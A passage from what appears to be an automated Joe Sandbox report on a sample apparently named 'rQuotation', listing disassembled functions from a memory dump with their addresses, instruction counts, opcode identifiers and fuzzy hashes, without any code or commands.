                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE10331A042869FDF25CFACD4407FEFBF2BF49310F08845AE496AB281D6759985DB50
                                                                                                                                                                                                                                                Function 0175892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7ebd3585e351c56615de4988b0448a053ed76adf7a984d86d6670331c8780128
                                                                                                                                                                                                                                                • Instruction ID: 1b504fd2ff1bb75e63839c01abb96770348d77c39f8eb08a5dfe7f277a4f2b41
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ebd3585e351c56615de4988b0448a053ed76adf7a984d86d6670331c8780128
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7D1F371E0060A8BDF45CF5AC841BFEF7F5AF88304F1881AAD955A7241DB75EA01CB61
                                                                                                                                                                                                                                                Function 016C65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 85a853c7a92a76adc22081c11bdf43e7b8a006129d9e849f30aa2e48b17fc5da
                                                                                                                                                                                                                                                • Instruction ID: f8cb2f954fdac7e9c50f7cb7b42668fabcc8c00294028b5bada5f7d71c945062
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85a853c7a92a76adc22081c11bdf43e7b8a006129d9e849f30aa2e48b17fc5da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32E1AF71508342CFC715CF28C890A7ABBE1FF89714F058A6DE99987351DB31E906CB96
                                                                                                                                                                                                                                                Function 016B8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3ac5eaee985d8cb5fccc89565d217d19da28c675689a0418aa0193119149df4c
                                                                                                                                                                                                                                                • Instruction ID: cda46b728d0071db07786177052cc04f0161bfb113559daea01e7fbdc1eda651
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ac5eaee985d8cb5fccc89565d217d19da28c675689a0418aa0193119149df4c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CD1DE71A002069BDB14DF68CCC0AFEB7BDAF64708F05462DE916DB285E734E991CB50
                                                                                                                                                                                                                                                Function 016EC6E0 Relevance: .4, Instructions: 367COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5178bf7664b2f27fc20b0ca92e2bb11bb0b03cff56a593db7c14799d59570c87
                                                                                                                                                                                                                                                • Instruction ID: a7c89d01a1723a32d18891f7af30a7ad92bd57c4deb869524a12e43c715d7627
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5178bf7664b2f27fc20b0ca92e2bb11bb0b03cff56a593db7c14799d59570c87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AD18F31E062198BEF28CE9CC9497BEBFF1FB44310F15822AD952AB385D7748942DB45
                                                                                                                                                                                                                                                Function 016ED2F0 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                                                                                                                                                • Instruction ID: 34bf5350d7d111a8581591e9d5677ddc8c7897b9997a392eb9ba90174a6f072e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FB13A22E115248BEB2D8A5CCCA937E67A3EFD5310F1DC369D9174F7D9DA3899028342
                                                                                                                                                                                                                                                Function 017995C3 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7b877ec91559e2a1fe941e73ebaa409432496b7c9cb5044f927a22ab5ab633fa
                                                                                                                                                                                                                                                • Instruction ID: acfdd34333a98c669459a9796532fd723438f949d739f27d42f888eb5d3f9f83
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b877ec91559e2a1fe941e73ebaa409432496b7c9cb5044f927a22ab5ab633fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83B18DB1910225AFFF26D724DC59FBBF6ACEB04754F04429D7A19E61C0DB709E848B60
                                                                                                                                                                                                                                                Function 01748243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction ID: 15a527e58abf7005c418a0bc4eaa824ef598c67b14628477cb0be1aac642f11d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBB17075A00609AFDB24DFD9C944FABFBBABF84304F10446EAA1297794DB34E905CB11
                                                                                                                                                                                                                                                Function 016D0535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction ID: 32295d5b3680c1b32fc2e7f4821159e71ec4242d106ccfe5c8c9c2d3367072ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3B10671A00656AFDB21DB68CD54BBEFBF6AF88300F190159E652DB381D730EA42CB50
                                                                                                                                                                                                                                                Function 016C83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4450fa0624dc50890bf77c26874104b41da4cab59d1c9ea0890288e5c6ba4af4
                                                                                                                                                                                                                                                • Instruction ID: 722547c533b275423260331081fcee3f1fb06d78c1c2f75c5b2ee096f6a57d1c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4450fa0624dc50890bf77c26874104b41da4cab59d1c9ea0890288e5c6ba4af4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBC156742083418FD764CF18C894BABB7E9FF98704F84492EE98987291D774E949CB92
                                                                                                                                                                                                                                                Function 016BC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3f199e3c5f376e6b16f15e1a03815ad36289f490db2dcdb5c64e68d2456a511a
                                                                                                                                                                                                                                                • Instruction ID: af152b844ab4aba875545205f0217da8dfad47e03e0635aebe40dd2aa878f618
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f199e3c5f376e6b16f15e1a03815ad36289f490db2dcdb5c64e68d2456a511a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CB16171A002668BDB35CF58CC90BE9B7B6EF44700F0485EAD54AE7245EB709EC6CB24
                                                                                                                                                                                                                                                Function 016EE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 062f13a68b16dfced8f2757cd68ad40d318105258509f4e4428abbfc4c523dba
                                                                                                                                                                                                                                                • Instruction ID: b41c11d7adf19e6a469caa3ab658d0baaa90e9032ab0543c7004fbf61f81c824
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 062f13a68b16dfced8f2757cd68ad40d318105258509f4e4428abbfc4c523dba
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62A11431E016299FEB22DB68CC4CFAEFBF5AB05714F150265EA00AB291D7749D42CBD1
                                                                                                                                                                                                                                                Function 01700185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f9485f5899c9950f56fb4d196f44e9c35d8748ad3c55da0a7102332ed58cbff4
                                                                                                                                                                                                                                                • Instruction ID: 9202a327bd80cc76c20c8c2d515be574db7ff793abdea3d395abfea430437f1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9485f5899c9950f56fb4d196f44e9c35d8748ad3c55da0a7102332ed58cbff4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8A1CE71A0171ADBDB26CF69C990BAAF7E5FF44364F104029FA46972C2EB74E815CB40
                                                                                                                                                                                                                                                Function 01794500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 514436ad774841c7a2b2b1e6bd0b9a48da7adb5b54c6b1ca4bcfe12245ac6bf1
                                                                                                                                                                                                                                                • Instruction ID: 0b3c578a3551778bd6a693ea1400edc13a9fcb973935c17cedf108f274152ab7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 514436ad774841c7a2b2b1e6bd0b9a48da7adb5b54c6b1ca4bcfe12245ac6bf1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9A1CC72A14602EFCB22DF18DA80F6AB7E9FF48704F05456CF64A9B651D334E806CB95
                                                                                                                                                                                                                                                Function 01792B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                                                • Instruction ID: 4be3943dbb7d735fac301fd1c8cec774edfa1ad453cd1333705f37daa4a43ffd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DB15A71E0061AEFDF19DFA9D880AADF7B5FF48300F148169E914A7352D730A945CB94
                                                                                                                                                                                                                                                Function 017460E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9a7bcfed0c366c8022132d16afb6df0efea32082565b5f05f03bfd07ce13e90a
                                                                                                                                                                                                                                                • Instruction ID: c09245a93a74a011bde973f4a79add6a08c4b16d30068ff863999b6307d96be9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a7bcfed0c366c8022132d16afb6df0efea32082565b5f05f03bfd07ce13e90a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D191B071E04216AFDF15CFA8D884BAEFFB6AF4A710F154169F610AB341D734E9009BA4
                                                                                                                                                                                                                                                Function 016DE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: da43800071b06dd96357f6d117b2b37f02dc0cc551e8d2738364b1cfcf314cdb
                                                                                                                                                                                                                                                • Instruction ID: 8d47ece80a91123adf7d0a7ebcd17358a1a555d08511ca1e3613495314aa0d16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da43800071b06dd96357f6d117b2b37f02dc0cc551e8d2738364b1cfcf314cdb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1912672E01626CBEB24DB58CC80BB9BBB2EF94758F094069EE059F340E736D942C751
                                                                                                                                                                                                                                                Function 016F4750 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                                                                                                                                                • Instruction ID: af7607a6cbe5f9015262f7c495edd734dbec5c2d0fcfc71ff437c2f3b0909497
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D812D21A082958BEB314D9CCCC127EFB61FF92210F29467ED652DB742CA64D846D791
                                                                                                                                                                                                                                                Function 0178F7B0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bacb4a6cb7591d064c576754e738fd3a0dffb7c300999879cbc76fbd2c7f3ed0
                                                                                                                                                                                                                                                • Instruction ID: 89bfd3c320b17551282d35256acf5bd3cc529442ba9c59c543c41b2481597031
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bacb4a6cb7591d064c576754e738fd3a0dffb7c300999879cbc76fbd2c7f3ed0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B391F671E90216AFEB15EF28C88076AFBE2EF44310F048578E955DB285D774E941CB90
                                                                                                                                                                                                                                                Function 0178F43F Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5da5ee4c4518d077e56244f49e1a1661a5a482665bea1e60e2ceed17eeb4e558
                                                                                                                                                                                                                                                • Instruction ID: b9639aaa853ecbcc17456929958c8399a04a33597cf17a6d9eb36ff84bfc9594
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5da5ee4c4518d077e56244f49e1a1661a5a482665bea1e60e2ceed17eeb4e558
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0191F532A101158BCB18CF79D8906BEBBF1FF88314F19826AD816DB39AD734E905CB50
                                                                                                                                                                                                                                                Function 017881CC Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 54b4433e9f20f38082a7a53008441b2960fbf68e5a74d2b16e0bdabc59ef18a7
                                                                                                                                                                                                                                                • Instruction ID: bb31e113d8f32a2098f8607d3ec016f7282e88eca7a43f04a10402b2c7c32ced
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54b4433e9f20f38082a7a53008441b2960fbf68e5a74d2b16e0bdabc59ef18a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2981D572E405198BCB14DF6DC8805AEF7F1FF88320B58436AD921E7680E774E951CB91
                                                                                                                                                                                                                                                Function 016D0E59 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: be480dd1290b535b26bb1bc50292f8404deb56b6eaf0d44452ad7d80060fc586
                                                                                                                                                                                                                                                • Instruction ID: d050972e92d0d0a16e56a9dfb801c6a64e212d7a205f5992e085c24d27d2dcf3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be480dd1290b535b26bb1bc50292f8404deb56b6eaf0d44452ad7d80060fc586
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE817271E001599FDB25CE6DCC849AEBBB3FFC5210F298299E8549B349D730E942CB90
                                                                                                                                                                                                                                                Function 01716ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5532c40b84b19234e111d0a451447073e515aa5a2b9ebb80d9bde0568fdf8776
                                                                                                                                                                                                                                                • Instruction ID: d262d5faf650e4bc213a2cea0f22c8c3771035a2e81506c7c8f5b2c862b01047
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5532c40b84b19234e111d0a451447073e515aa5a2b9ebb80d9bde0568fdf8776
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6817171A0061A9BDB24CF6DC940ABEFBF9FB48700F14852EE545E7644E374E940CBA4
                                                                                                                                                                                                                                                Function 0177E4F6 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 22935d54d224194fedaeee6c1e451cdb19c4f460f8e8146126ded1e6f6448172
                                                                                                                                                                                                                                                • Instruction ID: 6c16f8c8de181fd73f529e89efce1cc9d9428c21bb0e782f01374e582a1dd812
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22935d54d224194fedaeee6c1e451cdb19c4f460f8e8146126ded1e6f6448172
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39817176E002159BDF18CF58C990AADFBF1EF89310F2981A9D916EB385DB349D41CB90
                                                                                                                                                                                                                                                Function 0178AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                                • Instruction ID: d0e57207d9656ebfcdde04a40e7ea19e9cdc44a86d7e4a775480a0ab2479c816
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E819131A0020A9FDF19DF99C884AAEFBF2FF84310F18856AD9169B349D774E941CB50
                                                                                                                                                                                                                                                Function 016FE284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
